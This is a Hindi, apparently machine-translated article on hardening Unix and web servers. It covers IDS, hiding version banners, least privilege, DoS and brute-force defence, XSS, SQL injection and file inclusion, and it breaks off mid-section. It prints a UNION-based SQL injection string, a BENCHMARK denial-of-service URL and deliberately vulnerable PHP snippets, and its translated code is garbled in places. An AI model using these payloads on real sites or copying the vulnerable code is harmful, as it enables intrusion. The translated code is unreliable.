  • अतिक्रमण संसूचन प्रणाली... एक फ़ायरवॉल को एक नाइट के महल के पास पत्थर की दीवारों के रूप में माना जा सकता है। एक बार खड़े होकर आप अंदर बैठ जाते हैं - सूखा और आरामदायक। लेकिन क्या होगा अगर कोई पहले से ही तोप से दीवारों की ताकत का परीक्षण कर रहा है? हो सकता है कि आपको पहले से ही महल से बाहर देखने और किसी पर ढेर लगाने की आवश्यकता हो? महल की दीवारों के बाहर क्या हो रहा है, यह जानने के लिए, आपको सर्वर पर एक इंट्रूज़न डिटेक्शन सिस्टम (आईडीएस) की आवश्यकता है। यदि आपके पास अपनी पसंद के पैकेज के आधार पर ऐसी प्रणाली है, तो यदि कोई नैम्प तोप से फायरिंग शुरू कर देता है, तो आपको पता चल जाएगा, और हमलावर को "जो आप जानते हैं" के बारे में भी पता चल जाएगा।
  • गैर-मानक स्थितियों का विश्लेषण... सिस्टम पर कई लॉग अक्सर "त्रुटि: खुली फ़ाइल / आदि / पासवार्ड नहीं" या "पहुंच से वंचित" पढ़ते हैं। ये छोटी घंटियाँ हैं जो गलत तरीके से कॉन्फ़िगर किए गए एप्लिकेशन के बारे में बताती हैं जो कहीं कुछ नहीं पढ़ सकता है, या शायद यह घंटी नहीं है, लेकिन एक अलार्म है जो एक हैकर के बारे में अलार्म बजाता है जो आधा रास्ता है।

    किसी भी मामले में, व्यवस्थापक को ऐसी बातों से अवगत होना चाहिए। व्यवस्थापक के काम को सुविधाजनक बनाने के लिए, प्रोग्राम बनाए गए हैं जो दिलचस्प वाक्यांशों की उपस्थिति के लिए लॉग का विश्लेषण करेंगे और व्यवस्थापक को मेल द्वारा एक रिपोर्ट भेजेंगे। ऐसे अवसर का तिरस्कार न करें, ऐसे कार्यक्रमों की तुलना उन पहरेदारों से की जा सकती है जो एक भरोसेमंद रास्ते पर जाँच करते हैं, लेकिन क्या हर कोई निर्धारित व्यवहार करता है?

  • सॉफ़्टवेयर संस्करण निकालें... अपनी सेवाओं से बैनर हटा दें। वे बैनर नहीं हैं जो आप अपनी साइट पर दिखाते हैं, लेकिन वे पंक्तियाँ जो आपके प्रोग्राम कनेक्ट करते समय अभिवादन में या त्रुटियों के आउटपुट में देते हैं। अपने कार्यक्रमों के संस्करणों पर चमकने की कोई आवश्यकता नहीं है, हैकर उपलब्ध कार्यक्रमों के लिए इंटरनेट पर संस्करणों की तलाश कर रहे हैं जो इस या उस भेद्यता (शोषण - शोषण) का फायदा उठाते हैं।

    कोई एकल समाधान नहीं है, उदाहरण के लिए, यदि आप बंदरगाहों से एक निश्चित प्रोग्राम स्थापित करते हैं, तो मेक इंस्टाल क्लीन न लिखें, इसलिए आपके बिना सब कुछ डाउनलोड, संकलित और स्थापित हो जाएगा। लाने के लिए बेहतर है; अर्क बनाना; फिर फाइल उपनिर्देशिका पर जाएं और वहां स्रोत कोड में आप प्रोग्राम के संस्करण को सही कर सकते हैं या इसे एक अलग के रूप में पास कर सकते हैं, और उसके बाद ही इंस्टॉल को साफ कर सकते हैं।

    अपाचे बहुत जानकारीपूर्ण है और अभी भी सिस्टम के संस्करणों, PHP, पर्ल, ओपनएसएसएल के साथ चमकता है। httpd.conf ServerSignature Off ServerTokens Prod में निर्देश निर्दिष्ट करके अक्षम किया गया। इंटरनेट पर, आप किसी भी कार्यक्रम के लिए बैनर बदलने में मदद पा सकते हैं। लक्ष्य एक है - हमलावर को मूल्यवान जानकारी से वंचित करना। इंटरनेट से उपलब्ध सेवाओं की अपनी सूची को देखते हुए, अपने आप से पूछें कि क्या यह अपने बारे में और अपने द्वारा संग्रहीत जानकारी के बारे में अनावश्यक जानकारी देता है।

    उदाहरण के लिए, DNS सर्वर बाइंड "ज़ोन ट्रांसफर" की अनुमति दे सकता है और आपके कंप्यूटर उनके आईपी और डोमेन नाम के साथ सभी के लिए उपलब्ध होंगे, जो कि खराब है। विभिन्न स्कैनरों से अपने सर्वर की स्वयं जांच करें और उनका परिणाम ध्यानपूर्वक पढ़ें। प्रोग्राम बैनर को बदलते समय, मैं आपको सलाह देता हूं कि आप यादृच्छिक पाठ न डालें, लेकिन जिम्मेदारी के बारे में एक चेतावनी और यह कि कार्रवाई लॉग की जा रही है। चूंकि ऐसी घटनाएं हुई थीं जब हैकर को अदालत कक्ष में छोड़ दिया गया था, जैसे हैक किए गए एफ़टीपी सर्वर पर "वेलकम! वेलकम!" एक शिलालेख था।

  • आवश्यक न्यूनतम का नियम... उपलब्ध इंटरनेट सेवाओं को कम से कम करें। अनावश्यक अक्षम करें, क्योंकि आप अक्षम को हैक नहीं कर सकते। एक सामान्य गलती, उदाहरण के लिए, जब उसी मशीन पर अपाचे के साथ जोड़े गए MySQL सर्वर को इसके मानक पोर्ट 3306 पर दूरस्थ रूप से एक्सेस करने के लिए कॉन्फ़िगर किया गया है। क्यों? आदेश जारी करें netstat -na | grep LISTEN और अपने आप को उत्तर दें: क्या आप जानते हैं कि कौन से प्रोग्राम किस इंटरफ़ेस और किस पोर्ट का उपयोग कर रहे हैं? क्या आप स्थिति के नियंत्रण में हैं? अच्छा अगर ऐसा है।
  • कई मजबूत और अलग पासवर्ड... अक्सर हैकिंग वीडियो या हैकर कहानियों में हैकिंग के बारे में, वाक्यांश "यह अच्छा है कि व्यवस्थापक के पास व्यवस्थापक पैनल के लिए एक पासवर्ड था, जो ssh और ftp तक भी आया था"। मुझे आशा है कि यह आपके बारे में नहीं है। इसलिए नियम: विभिन्न सेवाओं के लिए पासवर्ड अलग-अलग और कम से कम 16 वर्णों के होने चाहिए। यदि आप भूलने से डरते हैं, तो उन्हें कागज के एक टुकड़े पर लिख दें (इस जगह सुरक्षा विशेषज्ञ मुझे मार डालते हैं), लेकिन यह एक दूरस्थ हमलावर से बेहतर है कि कुछ ही मिनटों में आपका पासवर्ड डिक्रिप्ट कर दे, क्योंकि पासवर्ड की छोटी लंबाई और एक शब्दकोश शब्द की समानता ने मुझे ऐसा करने की अनुमति दी।

    विभिन्न सेवाओं के लिए अलग-अलग पासवर्ड बनाना आसान है यदि सेवाओं को / आदि / पासवार्ड डेटाबेस में सिस्टम उपयोगकर्ता के रूप में अधिकृत नहीं किया जाता है, लेकिन वर्चुअल के रूप में अपने स्वयं के प्लानर या डीबीएमएस डेटाबेस में। उन सभी संसाधनों के लिए पासवर्ड को पासवर्ड.txt फ़ाइल में सर्वर पर संग्रहीत न करें, जिन तक एक व्यवस्थापक के रूप में आपकी पहुंच है।

  • परिसीमन... सर्वर पर आपकी सभी सेवाएं अलग-अलग सीमित खातों के तहत चलनी चाहिए और कभी भी रूट खाते के तहत नहीं चलनी चाहिए। मेरा विश्वास करें, यदि वे विशेषाधिकारों को सीमित खाते से रूट स्थिति (यूआईडी = 0, जीआईडी ​​= 0) तक बढ़ाते हैं, तो आप अपने अपडेट किए गए सिस्टम में ज्ञात छेदों की अनुपस्थिति से बच जाएंगे।

    वैसे, कई व्यवस्थापक ऐसी बात भूल जाते हैं, उदाहरण के लिए, Apache और MySQL के खातों की शेल तक पहुंच क्यों है! आखिरकार, आप इसे बंद कर सकते हैं और शेल के बजाय / बिन / गलत निर्दिष्ट कर सकते हैं। ठीक है, ईमानदारी से, अपने रिपोर्टिंग सर्वर पर अपने प्रोग्राम खातों की जांच करें और मुझे बताएं कि क्या मैं गलत हूं। अपने SQL डेटाबेस में, खातों को न्यूनतम आवश्यक विशेषाधिकारों तक सीमित रखें। केवल SELECT को कॉल करने पर FILE को विशेषाधिकार न दें।

  • जेल में सभी!सैंडबॉक्स या जेल के साथ काम करना सीखें और इन अलग-अलग कमरों में एप्लिकेशन चलाएं, इससे पूरे सर्वर को हैक करना मुश्किल हो जाएगा। यदि आप वर्चुअलाइजेशन का उपयोग कर रहे हैं, तो आप सेवाओं को विभिन्न अतिथि ऑपरेटिंग सिस्टम में फैला सकते हैं।
  • स्तरित रक्षा।अलग-अलग जगहों पर किसी चीज को कई तरह से प्रतिबंधित करना संभव है - इसे करें। कभी मत सोचो - मैंने इसे यहाँ मना किया है, वहाँ अनावश्यक चीजों को मना किया है।

असुरक्षित सेवाओं और स्वयं सर्वर पर हमलों के बारे में अधिक जानें।

  • DoS (सेवा से इनकार) हमला - एक ऐसा हमला जिसका लक्ष्य किसी सीमित सर्वर संसाधन (इंटरनेट चैनल, रैम, प्रोसेसर, आदि) को हथियाना है, ताकि सर्वर वैध उपयोगकर्ताओं की सेवा न कर सके। लाक्षणिक रूप से, कल्पना कीजिए कि एक घुसपैठिए ने आपको घर पर बुलाया और फोन पर चुप रहा, और इसलिए यह पूरी शाम चला। आप इस सब से थक गए और आपने फोन बंद कर दिया, और सुबह आपको पता चला कि आपने अपने बॉस का एक महत्वपूर्ण कॉल मिस कर दिया है। यहाँ एक DoS हमले के लिए एक वास्तविक जीवन सादृश्य है।

    वास्तविक जीवन में, DoS अक्सर ऐसा दिखता है, प्रोग्राम में त्रुटि के कारण, CPU उपयोग कूदता है और 100% पर लंबे समय तक रहता है, और हमलावर समय-समय पर प्रोग्राम में इस छेद का उपयोग करता है। एक टेढ़ा-मेढ़ा लिखा हुआ एप्लिकेशन सभी रैम को खत्म कर सकता है। या संग्रह में एक अत्यधिक संकुचित फ़ाइल के रूप में एक "मेल बम", जिसमें कई वर्ण [स्थान] हैं, जिसे एंटीवायरस जाँच के लिए अनपैक करेगा और अनपैक की गई विशाल फ़ाइल सर्वर पर हार्ड डिस्क विभाजन को भर देगी या / और कारण रिबूट करने के लिए सर्वर।

    डॉस हमले से सुरक्षा:

    • DoS हमले के लिए हेरफेर किए गए प्रोग्राम को अपडेट करना
    • उस खाते के लिए संसाधन कोटा कॉन्फ़िगर करें जिससे यह प्रोग्राम चल रहा है। * निक्स सिस्टम आपको प्रोसेसर उपयोग के प्रतिशत, रैम, स्पॉन्डेड प्रक्रियाओं की संख्या, खुली फाइलों आदि को कॉन्फ़िगर करने की अनुमति देता है। आदि।
    • प्रोग्राम में लॉगिंग सेट करें और कठपुतली हमलावर को खोजने का प्रयास करें और उसे फ़ायरवॉल में ब्लॉक करें।
    • प्रोग्राम को डेवलपर के रूप में कॉन्फ़िगर करें, गुरु सलाह देते हैं, इंटरनेट पर लेखों के अनुसार, यदि आप खुद को ऐसी स्थिति में पाते हैं।
  • DDoS (वही DoS, लेकिन आप पर कई ज़ॉम्बी कंप्यूटरों से हमला किया जाता है, के मार्गदर्शन में)
    हमलावर)। DDoS विनाशकारी है और इसका उपयोग केवल उन बदमाशों द्वारा किया जाता है जिनके पास ज़ोम्बीफाइड कारों के झुंड हैं और वे किसी हमले को रोकने या आपके व्यवसाय को नुकसान पहुंचाने के लिए पैसे की मांग करेंगे ताकि उपयोगकर्ता आपके सर्वर तक पहुंचे बिना किसी प्रतियोगी के पास जा सकें। DDoS हमलों का उपयोग हैकर्स द्वारा नहीं किया जाता है जिनका लक्ष्य आपके सर्वर को समझदारी से हैक करना है, हाँ, आपका सर्वर एक "रहस्य" है जिसे वे "हल" करना चाहते हैं।

    डीडीओएस से बचाव कैसे करें? यदि आप अपने स्वयं के प्रयासों और संसाधनों पर भरोसा करते हैं, तो आप स्क्रिप्ट के साथ काम को स्वचालित करके, विभिन्न लॉग से आईपी पते निकाल सकते हैं और उन्हें निषिद्ध फ़ायरवॉल नियमों में दर्ज कर सकते हैं। उदाहरण के लिए, हैकर पत्रिका में "क्या डीडीओएस के तहत जीवन है?" लेख के लेखक। डीडीओएस क्षति को कम करने के लिए इसे कैसे कॉन्फ़िगर किया जाए, इस पर बहुत सारे लेख।

    डीडीओएस सुरक्षा:

    • यदि DDoS को किसी एप्लिकेशन पर निर्देशित किया जाता है, तो लॉग में हमलावरों और वैध उपयोगकर्ताओं के बीच अंतर खोजने का प्रयास करें, और इसे एक स्क्रिप्ट के साथ स्वचालित करके, इसे फ़ायरवॉल नियमों में दर्ज करें।
    • यदि DDoS को सिस्टम पर निर्देशित किया जाता है (उदाहरण के लिए, ICMP प्रोटोकॉल के माध्यम से एक हमला), इसे स्वचालित करने के लिए एक स्क्रिप्ट का उपयोग करते हुए, इसे अस्वीकार में फ़ायरवॉल नियमों में दर्ज करें
    • उस खाते के लिए संसाधन कोटा कॉन्फ़िगर करें जिससे यह प्रोग्राम चल रहा है। * निक्स सिस्टम आपको प्रोसेसर के उपयोग के प्रतिशत, रैम, स्पॉन्डेड प्रक्रियाओं की संख्या, खुली फाइलों आदि को कॉन्फ़िगर करने की अनुमति देता है।
    • प्रोग्राम को डेवलपर के रूप में कॉन्फ़िगर करें, गुरु सलाह देते हैं, इंटरनेट पर लेखों के अनुसार, यदि आप खुद को ऐसी स्थिति में पाते हैं
    • किसी भी तरह से आपकी मदद करने के लिए कृपया अपने अपलाइन प्रदाता से संपर्क करें। को शिकायत लिखें [ईमेल संरक्षित] host_network_from_attacked.domain. यह हमलावर के नेटवर्क को आंशिक रूप से नष्ट करने में मदद करेगा, उसे नुकसान होने देगा, इसके लिए उसे पैसे खर्च करने होंगे। आप नैतिक संतुष्टि का अनुभव करेंगे।
    • Apache के लिए mod_security से परिचित हों, जो कुछ स्थितियों में आपकी मदद करने के लिए एक बेहतरीन टूल है।
  • पासवर्ड ब्रूटफोर्स हमला। यहां कार्यक्रमों में छेद को दोष नहीं देना है, वे केवल उपयोगकर्ता नाम / पासवर्ड की एक जोड़ी का चयन करते हैं। जिसने भी सर्वर को ssh कॉन्फ़िगर किया हुआ छोड़ दिया है, लेकिन कुछ IP से ssh एक्सेस को प्रतिबंधित करना भूल गया है और कुछ लॉगिन (ssh_config AllowUser में निर्देश) के साथ, पासवर्ड माशा: पासवर्ड_मैश को लॉग में मजबूर करने के प्रयासों को देखा होगा।

    पासवर्ड ब्रूटफोर्स सुरक्षा:

    • असफल लॉगिन / पासवर्ड प्रयासों की संख्या सीमित करें
    • यदि एप्लिकेशन अनुमति देता है, तो नए लॉगिन / पासवर्ड प्रयास से पहले समय में वृद्धि को कॉन्फ़िगर करें।
    • यदि लोगों के एक संकीर्ण दायरे को एप्लिकेशन के साथ काम करने की आवश्यकता है, तो ऐसा नियम बनाएं और उन्हें सीमित करें

गतिशील सेवा सामग्री के माध्यम से हमला

इस प्रकार का हमला अक्सर अपाचे + (PHP | PERL) + (MySQL | PostgreSQL) बंडल पर * निक्स वर्ल्ड के लिए और आईआईएस + एएसपी + माइक्रोसॉफ्ट एसक्यूएल सर्वर एमएस विंडोज दुनिया के लिए एक साधारण ब्राउज़र का उपयोग करते हुए होता है, लेकिन यह केवल एक है विशेष मामला, जिसका उपयोग वेब की लोकप्रियता के कारण अधिक बार किया जाता है। इस बंडल में, प्रोग्रामिंग भाषाएं एएसपी, पीएचपी, पर्ल, एसक्यूएल हैं, इसलिए उन्हें अक्सर हैकर्स द्वारा उनके विनाशकारी निर्माणों की रचना के लिए उपयोग किया जाएगा।

लेकिन सबसे महत्वपूर्ण बात यह समझना है कि ऐसे स्नायुबंधन सेवा + उनके ऊपर गतिशील सामग्रीकई प्रोग्रामिंग भाषाएं हैं और इसलिए वे सभी हैकर्स की बंदूक के नीचे हैं। उदाहरण के लिए, यह एक अधूरी सूची है:

  • वेब सर्वर + सीजीआई स्क्रिप्ट
  • एक प्राचीन बंडल जिसका अब उपयोग नहीं किया जाता है - Apache + PHF (अर्थात् P H F) स्क्रिप्ट
  • आईआईएस + कोल्डफ्यूजन एप्लीकेशन सर्वर
  • एसएसआई (सर्वर साइड शामिल) तंत्र

इसके अलावा, हम ज्यादातर वेब-हैक के बारे में बात करेंगे, लेकिन यह न भूलें कि नीचे वर्णित सब कुछ सेवा के अन्य बंडलों + गतिशील सामग्री के लिए भी सही है। शब्द अलग हैं, लेकिन सार एक ही है। आज हैकर्स ब्राउज़र से वेब पर हमला करते हैं, कल Z सेवा के खिलाफ R क्लाइंट के साथ। वेब सर्वर, जो स्वयं डेटाबेस और कई प्रोग्रामिंग भाषाओं से जुड़ा है, इस तरह के हमलों के लिए एक मंच बन गया है।

इस तरह के सभी हमलों का मतलब साइट की गतिशील सामग्री की सेवा करने वाली स्क्रिप्ट में त्रुटियों के लिए साइट को स्कैन करने के लिए ब्राउज़र का उपयोग करने का प्रयास करना है।

इसलिए निष्कर्ष - वेब पर हमले के माध्यम से साइट को हैक करना, जिसमें केवल स्थिर HTML-पृष्ठ होते हैं जो केवल एक दूसरे से लिंक होते हैं, असंभव है। आपकी वेबसाइट के माध्यम से हमले तब हुए जब लोग अधिक अन्तरक्रियाशीलता चाहते थे और इसे प्रोग्रामिंग भाषाओं और डेटाबेस के माध्यम से जोड़ा।

साइट पर सर्फिंग करने वाले हैकर्स उन लिपियों पर विशेष ध्यान देते हैं जो किसी भी पैरामीटर से गुजरती हैं। लेकिन क्या होगा यदि स्क्रिप्ट का लेखक यह जाँच नहीं करता है कि वास्तव में पैरामीटर मान के रूप में क्या पारित किया गया है?

सेवा की गतिशील सामग्री पर हमलों के खिलाफ व्यवस्थापक के लिए सामान्य समाधान (वेब ​​साइट, एक विशेष मामले के रूप में)

  • अद्यतन... हम पहले ही इस बारे में बात कर चुके हैं, लेकिन अगर आप तीसरे पक्ष के विकास (मंचों, दीर्घाओं, चैट आदि के इंजन) का उपयोग करते हैं, तो कमजोरियों और पैच होल के बारे में संदेश प्राप्त करें। हैकर्स की राय है कि यदि पोर्टल वित्त और उनके टर्नओवर के साथ काम करता है, तो ऐसे पोर्टल पर किसी और के विकास को छोड़कर, अपने स्वयं के विकास के लिए वांछनीय नहीं है। बेशक, यह समझा जाता है कि साइट के लिए अपने स्वयं के इंजनों का विकास कोडर्स द्वारा लिखा गया था जो सुरक्षित रूप से प्रोग्राम करना जानते हैं और इंटरनेट पर खतरों की समझ रखते हैं।
  • गैर-मानक बनें... कई हैकर उपयोगिताओं में, भेद्यता डेटाबेस, पथ मंच /, गैलरी /, चित्र / अक्सर दिखाई देते हैं। बहुत आराम से! व्यवस्थापक को जानें, उनमें से आधे आपकी साइट पर दाढ़ी और थूकेंगे जब आपकी साइट / usr / www में स्थित नहीं है, और आपका व्यवस्थापक क्षेत्र site.com/admin नहीं है। लब्बोलुआब यह है, यदि आप मानक नहीं हैं, तो यह एक हैकर के पहियों में एक अतिरिक्त छड़ी है जो आपकी साइट पर हमला करता है। उसे मैनुअल बेस/स्क्रिप्ट में जोड़ना/ठीक करना होगा। क्या एक हैकर हमेशा कर सकता है या चाहता है? युवा स्क्रिप्ट किडिस हैकर्स निश्चित रूप से डर जाएंगे। यहाँ उदाहरण के लिए PHP सुरक्षा युक्तियाँ दी गई हैं

    # PHP कोड को अन्य प्रकार के कोड की तरह बनाएं
    AddType एप्लिकेशन / x-httpd-php .asp .py .pl
    # PHP कोड को अज्ञात प्रकार के कोड की तरह बनाएं
    AddType एप्लिकेशन / x-httpd-php .bop .foo .133t
    # PHP कोड को html जैसा बनाएं
    AddType एप्लिकेशन / x-httpd-php .html .htm

    PHP के लिए ओफ़्फ़ुसेशन के माध्यम से सुरक्षा के इस रूप में कम लागत पर कुछ नुकसान हैं। हैकर्स स्वयं अपने हैक्स का वर्णन करते हुए लिखते हैं कि वे वही सॉफ़्टवेयर डाउनलोड करते हैं जो आपके सर्वर पर डेवलपर की साइट से है और देखते हैं कि किस डिफ़ॉल्ट तालिका नाम / पथ / यह या वह इंजन काम करता है। गैर-मानक होने का सामान्य अर्थ हैकिंग प्रक्रिया में देरी करना है ताकि हैकर "ब्लिट्जक्रेग" में सफल न हो, और जितना अधिक वह खींचता है, उतनी ही अधिक संभावना है कि इसका पता लगाया जाए।

  • साइट पर इंजन और स्क्रिप्ट के संस्करण निकालें... यह मूल्यवान जानकारी है कि एक हमलावर को हैकिंग के लिए तैयार समाधान की तलाश में उस संस्करण को जानने से वंचित किया जाना चाहिए। सुनिश्चित करें कि आपकी स्क्रिप्ट त्रुटियों पर उपयोगी जानकारी प्रदर्शित नहीं करती हैं, जैसे: स्क्रिप्ट का पथ जहां त्रुटि हुई ("पथ विस्तार" समस्या) और त्रुटि आउटपुट स्वयं।
  • जरूरत के बारे में सोचो .htaccess... .htaccess फ़ाइलों की उपस्थिति का मतलब है कि आप मुख्य अपाचे कॉन्फ़िगरेशन में सेट अपने विकल्पों को ओवरराइड कर सकते हैं, मेरा विश्वास करो, हैकर्स ऐसा करेंगे। यदि आप "AllowOverride none" निर्देश का उपयोग करके .htaccess के उपयोग को अक्षम करते हैं, तो आपको अपाचे के लिए एक प्रदर्शन लाभ मिलेगा, क्योंकि वह प्रत्येक अनुरोध के साथ वेब पेज के पथ पर सभी निर्देशिकाओं को नहीं देखेगा और सुरक्षा में वृद्धि करेगा। अपाचे वेब सर्वर।

गतिशील सामग्री पर हमलों के बारे में अधिक जानें (एक विशेष मामले के रूप में वेब साइट)

  • एक्सएसएस (क्रॉस साइट स्क्रिप्टिंग)।
    क्रॉस-साइट स्क्रिप्टिंग को एक्सएसएस कहा जाता है, सीएसएस नहीं, क्योंकि सीएसएस कैस्केडिंग स्टाइल शीट्स के लिए प्रारंभिक संक्षिप्त शब्द है। XSS हमले सर्वर के विरुद्ध नहीं, बल्कि उस सर्वर के उपयोगकर्ताओं के विरुद्ध निर्देशित होते हैं। लेकिन खुश रहने के लिए एडमिन जरूरी नहीं है! एक्सएसएस हमला इस तरह दिखता है, साइट में वेब पेज या स्क्रिप्ट पैरामीटर पर संपादन योग्य फ़ील्ड हैं जो कि जैसे निर्माणों पर फ़िल्टर नहीं किए जाते हैं<, >, जावास्क्रिप्ट।

    हैकर क्लाइंट-साइड प्रोग्रामिंग भाषा कोड, आमतौर पर जावा और वीबीस्क्रिप्ट, संपादन योग्य फ़ील्ड में जोड़ता है, और यह कोड HTML पृष्ठ का हिस्सा बन जाता है। जब कोई उपयोगकर्ता ऐसे पृष्ठ पर जाता है, तो उनका ब्राउज़र पृष्ठ को पार्स करता है और इस कोड को निष्पादित करता है।
    हैकर्स XSS के साथ क्या कर रहे हैं?

    • कुकीज़ चुराना (कुकीज़, बन्स) - ये टेक्स्ट फ़ाइलें उस जानकारी को संग्रहीत करती हैं जिसे सर्वर उपयोगकर्ता को उसकी बाद की पहचान के लिए "डाल" देता है। उदाहरण में, यदि आप ऐसी सामग्री के साथ एक test.html फ़ाइल बनाते हैं (इसे स्वयं लिखें), तो जब आप इसे किसी ब्राउज़र में चलाते हैं, तो यह XSS प्रदर्शित करेगा।
      प्रिय व्यवस्थापक, साइट पर जाते समय एक त्रुटि हुई
      मदद

      लेकिन आप जावा में एक स्क्रिप्ट लिख सकते हैं और अधिक गंभीर... आमतौर पर, ऐसी स्क्रिप्ट व्यवस्थापक के वेबमेल पर लिखती हैं और, सोशल इंजीनियरिंग का उपयोग करके, उसकी कुकी प्राप्त करने के लिए उसे संदेश पढ़ने के लिए प्रेरित करने का प्रयास करती हैं।

      यदि कुकीज़ आईपी पते और अतिरिक्त सुरक्षा उपायों के लिए बाध्य नहीं हैं, तो वे अपनी कुकीज़ को व्यवस्थापक की कुकीज़ से बदल देते हैं और व्यवस्थापक पैनल में जाने का प्रयास करते हैं, जो उपयोगकर्ता नाम और पासवर्ड की जांच नहीं करता है और केवल कुकीज़ द्वारा लोगों की पहचान करता है।

    • साइट की खराबी (विकृति - साइट के प्रारंभ पृष्ठ का प्रतिस्थापन, अक्सर index.html)
    • एक दूरस्थ उपयोगकर्ता का ट्रोजनीकरण। उपयोगकर्ताओं के ब्राउज़र के लिए नए कारनामों का चयन किया जाता है और जब वे एक संवेदनशील पृष्ठ में प्रवेश करते हैं, तो कंप्यूटर को ट्रोजन से संक्रमित करने का प्रयास किया जाता है। यदि उपयोगकर्ता के पास नए डेटाबेस के साथ एक एंटीवायरस स्थापित है, तो वह सिस्टम पर ट्रोजन की उपस्थिति का संकेत देगा। और आपकी साइट यूजर की नजरों में गिर जाएगी, शायद वह आपके पास दोबारा नहीं आएगा।
    • करने योग्य। बड़ी संख्या में आगंतुकों के साथ, स्क्रिप्ट अतिरिक्त रूप से आपके सर्वर से या किसी अन्य से अन्य पृष्ठों का अनुरोध करेगी, यह किसी के लिए डीओएस हो सकता है।

    समाधान:

    • सूचना इनपुट क्षेत्रों से डेटाबेस में एचटीएमएल टैग के लेखन को अवरुद्ध करने के लिए, PHP के लिए htmlspecialchars जैसे निर्माण का उपयोग करें, जो प्रतिस्थापित करेगा< на <, >ऑन>, और ऑन एंड वगैरह
      उदाहरण,

      $ टिप्पणी = htmlspecialchars ($ टिप्पणी, ENT_QUOTES);
      $ query = "गेस्टबुक में डालें
      (नाम, स्थान, ईमेल, यूआरएल, टिप्पणी) मान
      ("$ नाम", "$ स्थान", "$ ईमेल", "$ url", "$ टिप्पणी") ";
      mysql_query ($ क्वेरी) या मरना (mysql_error ());

    • अपनी स्क्रिप्ट में उन सभी मापदंडों की जाँच करें और फ़िल्टर करें जो उपयोगकर्ता दर्ज करता है और जो पता बार के माध्यम से स्क्रिप्ट को पास किया जाता है। आने वाले डेटा को पार्स करने के लिए रेगुलर एक्सप्रेशन का ठीक से उपयोग करना सीखें। ऐसी सामग्री खोजें जो आपकी प्रोग्रामिंग भाषा के लिए सुरक्षित कोडिंग तकनीक सिखाए।
    • यदि आप अपनी साइट पर कुकी तकनीक का उपयोग करना चाहते हैं, तो कृपया हमारे सुरक्षित कुकी अभ्यासों को पढ़ें। अपने कार्यों को समय पर और आईपी पते से सीमित करें।
    • एक व्यवस्थापक के रूप में, सोशल इंजीनियरिंग द्वारा प्रतिबंधित होने पर सतर्क रहें। अपने क्लाइंट कंप्यूटर पर पर्सनल कंप्यूटर सुरक्षा के बारे में मत भूलना।
  • एसक्यूएल इंजेक्षन। एसक्यूएल इंजेक्षन।
    इस रोग का अर्थ है कि एक अनियंत्रित पैरामीटर को स्क्रिप्ट में दिखाई देने वाली SQL क्वेरी में प्रतिस्थापित किया जाता है। हैकर को SQL इंजेक्शन स्क्रिप्ट मिलती है सरल तरीके से, उद्धरण चिह्न site.com/view.php?id=1 "पैरामीटर मान को आपूर्ति की जाती है" या सांख्यिक पैरामीटर को संशोधित किया जाता है इसलिए site.com/view.php?id=2-1.

    यदि सम्मिलित उद्धरण चिह्न "त्रुटि" का कारण बनता है (संदेशों का एक समूह कि इस तरह के अनुरोध को इस पथ के साथ ऐसी और ऐसी स्क्रिप्ट में निष्पादित नहीं किया जा रहा है), तो ऐसी स्क्रिप्ट इसे आगे बढ़ाने के लिए एक उम्मीदवार है। साइबर अपराधी अक्सर "साइट: www.victim.ru चेतावनी" जैसे समान प्रश्नों वाले खोज इंजन का अनुरोध करते हुए Google हैक का उपयोग करते हैं।

    कोड जो मूल्य की जांच नहीं करता है और SQL इंजेक्शन से ग्रस्त है

    $ आईडी = $ _REQUEST ["आईडी"];
    $ परिणाम = mysql_query ("शीर्षक, टेक्स्ट, डेटन्यूज़ चुनें, 'समाचार से लेखक' जहां 'आईडी' = "$ आईडी "");

    अब कल्पना कीजिए कि एक संख्या के बजाय, आपको "-1 Union select null/*" (बिना उद्धरण के) प्रतिस्थापित किया जाएगा और फिर आपकी क्वेरी बदल जाएगी

    शीर्षक, टेक्स्ट, डेटन्यूज़, लेखक 'समाचार' से चुनें जहां 'आईडी' = "- 1 संघ नल / * का चयन करें"

    यही है, हैकर आपके अनुरोध के अलावा, संघ निर्देश का उपयोग करके आपके अनुरोध के साथ संयुक्त चाहता है। और फिर हैकर अन्य प्रश्नों को लिखने का प्रयास करेगा और, SQL भाषा की शक्ति को देखते हुए, यह व्यवस्थापक के लिए अच्छा नहीं है। अपने सर्वर पर रूट अधिकार प्राप्त करने के लिए ख़राब (विकृति - साइट के होम पेज को बदलना) से। SQL इंजेक्शन की बदौलत एक हैकर एक DoS हमला भी कर सकता है: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5 (current_date))) ऐसे कुछ अनुरोध और सर्वर 100% CPU पर लंबे समय तक लोड।

    एसक्यूएल इंजेक्शन सुरक्षा:

    • SQL सर्वर टूल का व्यापक उपयोग करें जैसे कि दृश्य और संग्रहीत कार्यविधियाँ। यह डेटाबेस तक अनधिकृत पहुंच को सीमित कर देगा।
    • किसी अनुरोध के लिए एक पैरामीटर पास करने से पहले, इसके प्रकार (PHP के लिए - is_bool (), is_float (), is_int (), is_string (), is_object (), is_array () और is_integer ()) और, पर जाँच की जानी चाहिए कम से कम, PHP के लिए addlashes जैसे निर्माण का उपयोग करके उद्धरण दें।
    • सभी स्क्रिप्ट किसी न किसी डेटाबेस खाते से डेटाबेस के साथ काम करती हैं, इस खाते से उन सभी विशेषाधिकारों को हटा दें जिनकी काम करने की आवश्यकता नहीं है। अक्सर हैकर्स MySQL कमांड का उपयोग करते हैं (MySQL को एक उदाहरण के रूप में लिया जाता है, यह किसी भी SQL सर्वर पर लागू होता है) "LOAD DATA INFILE" सर्वर से आवश्यक फाइलों को पढ़ने के लिए और पढ़ने योग्य खाते के तहत MySQL चल रहा है। इसलिए निष्कर्ष, अपनी स्क्रिप्ट के लिए अनावश्यक विशेषाधिकारों को अक्षम करें, जैसे कि FILE, जो LOAD DATA INFILE कमांड का उपयोग करने के लिए आवश्यक हैं। "मूल न्यूनतम" के सिद्धांत को आधार के रूप में लिया जाना चाहिए।
    • जिस सिस्टम खाते के तहत SQL सर्वर चल रहा है, उसकी साइट के पेजों और सर्वर की सिस्टम फाइलों तक पहुंच नहीं होनी चाहिए।
  • फ़ाइलें कनेक्ट कर रहा है। फ़ाइल शामिल करें। मान लें कि एक पेज साइट है।

    $ फ़ाइल = $ _REQUEST ["फ़ाइल"];
    शामिल ($ फ़ाइल। ". html");

